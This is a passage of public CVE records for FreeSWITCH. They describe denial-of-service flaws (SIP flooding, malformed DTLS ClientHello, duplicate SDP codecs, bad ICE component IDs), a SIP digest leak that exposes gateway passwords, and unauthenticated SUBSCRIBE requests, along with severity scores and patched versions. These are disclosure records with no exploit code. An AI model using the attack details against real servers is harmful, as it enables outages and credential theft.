"title": "FreeSWITCH susceptible to Denial of Service via SIP flooding",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41145",
"STATE": "PUBLIC",
"TITLE": "FreeSWITCH susceptible to Denial of Service via SIP flooding"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "freeswitch",
"version": {
"version_data": [
{
"version_value": "\u003c 1.10.7"
}
]
}
}
]
},
"vendor_name": "signalwire"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-400: Uncontrolled Resource Consumption"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m",
"refsource": "CONFIRM",
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m"
}
]
},
"source": {
"advisory": "GHSA-jvpq-23v4-gp3m",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41145",
"datePublished": "2021-10-25T22:05:11",
"dateReserved": "2021-09-15T00:00:00",
"dateUpdated": "2024-08-04T02:59:31.586Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-51443 (GCVE-0-2023-51443)
Vulnerability from nvd – Published: 2023-12-27 16:30 – Updated: 2025-11-04 18:21
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.
Severity ?
7.5 (High)
CWE
- CWE-703 - Improper Check or Handling of Exceptional Conditions
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.11
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:21:32.334Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6"
},
{
"name": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176393/FreeSWITCH-Denial-Of-Service.html"
},
{
"url": "http://packetstormsecurity.com/files/176311/FreeSWITCH-1.10.10-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/29"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-51443",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-27T15:19:54.460268Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-27T15:29:46.844Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-08T16:06:20.244Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-39gv-hq72-j6m6"
},
{
"name": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/commit/86cbda90b84ba186e508fbc7bfae469270a97d11"
},
{
"url": "http://packetstormsecurity.com/files/176393/FreeSWITCH-Denial-Of-Service.html"
}
],
"source": {
"advisory": "GHSA-39gv-hq72-j6m6",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-51443",
"datePublished": "2023-12-27T16:30:48.425Z",
"dateReserved": "2023-12-19T13:52:41.787Z",
"dateUpdated": "2025-11-04T18:21:32.334Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-40019 (GCVE-0-2023-40019)
Vulnerability from nvd – Published: 2023-09-15 19:34 – Updated: 2024-09-25 18:24
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names. When a call in FreeSWITCH completes codec negotiation, the `codec_string` channel variable is set with the result of the negotiation. On a subsequent re-negotiation, if an SDP is offered that contains codecs with the same names but with different formats, there may be too many codec matches detected by FreeSWITCH leading to overflows of its internal arrays. By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it. Version 1.10.10 contains a patch for this issue.
Severity ?
7.5 (High)
CWE
- CWE-770 - Allocation of Resources Without Limits or Throttling
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.10
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:24:54.547Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-40019",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-25T18:23:34.223244Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-25T18:24:36.310Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.10"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names. When a call in FreeSWITCH completes codec negotiation, the `codec_string` channel variable is set with the result of the negotiation. On a subsequent re-negotiation, if an SDP is offered that contains codecs with the same names but with different formats, there may be too many codec matches detected by FreeSWITCH leading to overflows of its internal arrays. By abusing this vulnerability, an attacker is able to corrupt stack of FreeSWITCH leading to an undefined behavior of the system or simply crash it. Version 1.10.10 contains a patch for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-09-15T19:34:32.429Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-gjj5-79p2-9g3q"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"source": {
"advisory": "GHSA-gjj5-79p2-9g3q",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH allows authorized users to cause a denial of service attack by sending re-INVITE with SDP containing duplicate codec names"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-40019",
"datePublished": "2023-09-15T19:34:32.429Z",
"dateReserved": "2023-08-08T13:46:25.242Z",
"dateUpdated": "2024-09-25T18:24:36.310Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-40018 (GCVE-0-2023-40018)
Vulnerability from nvd – Published: 2023-09-15 19:32 – Updated: 2024-09-25 18:02
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue.
Severity ?
7.5 (High)
CWE
- CWE-787 - Out-of-bounds Write
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.10
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T18:24:54.689Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-40018",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-25T18:02:51.253210Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-25T18:02:59.227Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.10"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-09-15T19:32:19.207Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"source": {
"advisory": "GHSA-7mwp-86fv-hcg3",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-40018",
"datePublished": "2023-09-15T19:32:19.207Z",
"dateReserved": "2023-08-08T13:46:25.242Z",
"dateUpdated": "2024-09-25T18:02:59.227Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41158 (GCVE-0-2021-41158)
Vulnerability from nvd – Published: 2021-10-26 13:55 – Updated: 2024-08-04 02:59
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges.
Severity ?
5.8 (Medium)
CWE
- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.7
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.587Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
},
{
"name": "20211026 [ES2021-05] FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH\u0027s SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH\u0027s network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-10-26T16:06:11",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
},
{
"name": "20211026 [ES2021-05] FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
}
],
"source": {
"advisory": "GHSA-3v3f-99mv-qvj4",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41158",
"STATE": "PUBLIC",
"TITLE": "FreeSWITCH vulnerable to SIP digest leak for configured gateways"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "freeswitch",
"version": {
"version_data": [
{
"version_value": "\u003c 1.10.7"
}
]
}
}
]
},
"vendor_name": "signalwire"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH\u0027s SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH\u0027s network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4",
"refsource": "CONFIRM",
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
},
{
"name": "20211026 [ES2021-05] FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
}
]
},
"source": {
"advisory": "GHSA-3v3f-99mv-qvj4",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41158",
"datePublished": "2021-10-26T13:55:10",
"dateReserved": "2021-09-15T00:00:00",
"dateUpdated": "2024-08-04T02:59:31.587Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41157 (GCVE-0-2021-41157)
Vulnerability from nvd – Published: 2021-10-26 13:35 – Updated: 2024-08-04 02:59
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.
Severity ?
5.3 (Medium)
CWE
- CWE-287 - Improper Authentication
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.6
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.697Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"name": "20211026 [ES2021-08] FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
